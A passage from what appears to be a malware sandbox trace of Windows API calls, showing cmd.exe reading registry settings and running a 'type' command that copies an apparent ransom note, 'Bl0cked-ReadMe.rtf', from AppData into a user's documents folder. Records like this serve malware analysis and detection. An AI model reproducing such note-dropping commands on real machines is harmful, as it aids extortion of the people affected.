(in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x4, lpData=0x26e9e8*=0x40, lpcbData=0x26e9e0*=0x4) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x4, lpData=0x26e9e8*=0x40, lpcbData=0x26e9e0*=0x4) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x0, lpData=0x26e9e8*=0x40, lpcbData=0x26e9e0*=0x1000) returned 0x2 [0234.853] RegCloseKey (hKey=0x40) returned 0x0 [0234.853] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e9dc | out: phkResult=0x26e9dc*=0x40) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x0, lpData=0x26e9e8*=0x40, lpcbData=0x26e9e0*=0x1000) returned 0x2 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x4, lpData=0x26e9e8*=0x1, lpcbData=0x26e9e0*=0x4) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x0, lpData=0x26e9e8*=0x1, lpcbData=0x26e9e0*=0x1000) returned 0x2 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x4, lpData=0x26e9e8*=0x0, lpcbData=0x26e9e0*=0x4) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x4, lpData=0x26e9e8*=0x9, lpcbData=0x26e9e0*=0x4) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x4, lpData=0x26e9e8*=0x9, lpcbData=0x26e9e0*=0x4) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x0, lpData=0x26e9e8*=0x9, lpcbData=0x26e9e0*=0x1000) returned 0x2 [0234.853] RegCloseKey (hKey=0x40) returned 0x0 [0234.853] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.853] srand (_Seed=0x5b8863c2) [0234.853] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" [0234.853] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" [0234.853] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.854] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3918e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.854] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.854] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.854] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.854] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.854] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.854] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.854] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.854] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.854] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.854] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.854] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.854] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.854] GetEnvironmentStringsW () returned 0x3922d0* [0234.854] FreeEnvironmentStringsW (penv=0x3922d0) returned 1 [0234.854] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.854] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.854] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.854] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.854] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.854] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.854] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.854] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.854] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.854] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.854] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f7a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.855] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f7a8, lpFilePart=0x26f7a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f7a4*="Desktop") returned 0x18 [0234.855] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.855] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f524 | out: lpFindFileData=0x26f524) returned 0x390010 [0234.855] FindClose (in: hFindFile=0x390010 | out: hFindFile=0x390010) returned 1 [0234.855] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f524 | out: lpFindFileData=0x26f524) returned 0x390010 [0234.855] FindClose (in: hFindFile=0x390010 | out: hFindFile=0x390010) returned 1 [0234.855] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f524 | out: lpFindFileData=0x26f524) returned 0x390010 [0234.855] FindClose (in: hFindFile=0x390010 | out: hFindFile=0x390010) returned 1 [0234.855] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.855] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.855] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.855] GetEnvironmentStringsW () returned 0x392af0* [0234.856] FreeEnvironmentStringsW (penv=0x392af0) returned 1 [0234.856] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.856] GetConsoleOutputCP () returned 0x1b5 [0234.856] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.856] GetUserDefaultLCID () returned 0x409 [0234.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f8e8, cchData=128 | out: lpLCData="0") returned 2 [0234.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f8e8, cchData=128 | out: lpLCData="0") returned 2 [0234.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f8e8, cchData=128 | out: lpLCData="1") returned 2 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.857] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.858] GetConsoleTitleW (in: lpConsoleTitle=0x3808e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.858] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.858] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.858] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.858] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.859] _wcsicmp (_String1="type", _String2=")") returned 75 [0234.859] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0234.859] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0234.859] _wcsicmp (_String1="IF", _String2="type") returned -11 [0234.859] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0234.859] _wcsicmp (_String1="REM", _String2="type") returned -2 [0234.859] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0234.862] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.862] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.862] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.862] GetFileType (hFile=0x7) returned 0x2 [0234.862] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.862] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f7e0 | out: lpMode=0x26f7e0) returned 1 [0234.862] _dup (_FileHandle=1) returned 3 [0234.863] _close (_FileHandle=1) returned 0 [0234.863] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0234.863] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26f7b0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0234.863] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0234.863] GetConsoleTitleW (in: lpConsoleTitle=0x26f5e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.863] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0234.863] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0234.863] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0234.863] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0234.864] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.864] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x26f144, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f144) returned 0x380e70 [0234.864] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0234.864] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0234.864] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0234.865] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26e050, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0234.865] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0234.865] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.865] GetFileType (hFile=0x54) returned 0x1 [0234.865] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.865] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x26e0a8 | out: lpFileSizeHigh=0x26e0a8*=0x0) returned 0x1632 [0234.865] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.865] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.865] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.865] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.865] GetFileType (hFile=0x4c) returned 0x1 [0234.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.865] GetFileType (hFile=0x4c) returned 0x1 [0234.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.865] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.866] GetFileType (hFile=0x4c) returned 0x1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] GetFileType (hFile=0x4c) returned 0x1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] GetFileType (hFile=0x4c) returned 0x1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] GetFileType (hFile=0x4c) returned 0x1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] GetFileType (hFile=0x4c) returned 0x1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] GetFileType (hFile=0x4c) returned 0x1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.868] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.868] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.868] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.868] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] GetFileType (hFile=0x4c) returned 0x1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] GetFileType (hFile=0x4c) returned 0x1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] GetFileType (hFile=0x4c) returned 0x1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] GetFileType (hFile=0x4c) returned 0x1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] GetFileType (hFile=0x4c) returned 0x1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] GetFileType (hFile=0x4c) returned 0x1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] GetFileType (hFile=0x4c) returned 0x1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] GetFileType (hFile=0x4c) returned 0x1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.869] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.869] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.869] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.869] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] GetFileType (hFile=0x4c) returned 0x1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] GetFileType (hFile=0x4c) returned 0x1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] GetFileType (hFile=0x4c) returned 0x1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] GetFileType (hFile=0x4c) returned 0x1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] GetFileType (hFile=0x4c) returned 0x1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] GetFileType (hFile=0x4c) returned 0x1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] GetFileType (hFile=0x4c) returned 0x1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] GetFileType (hFile=0x4c) returned 0x1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.870] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.870] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.870] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.871] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] GetFileType (hFile=0x4c) returned 0x1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] GetFileType (hFile=0x4c) returned 0x1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] GetFileType (hFile=0x4c) returned 0x1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] GetFileType (hFile=0x4c) returned 0x1 [0234.871] _get_osfhandle 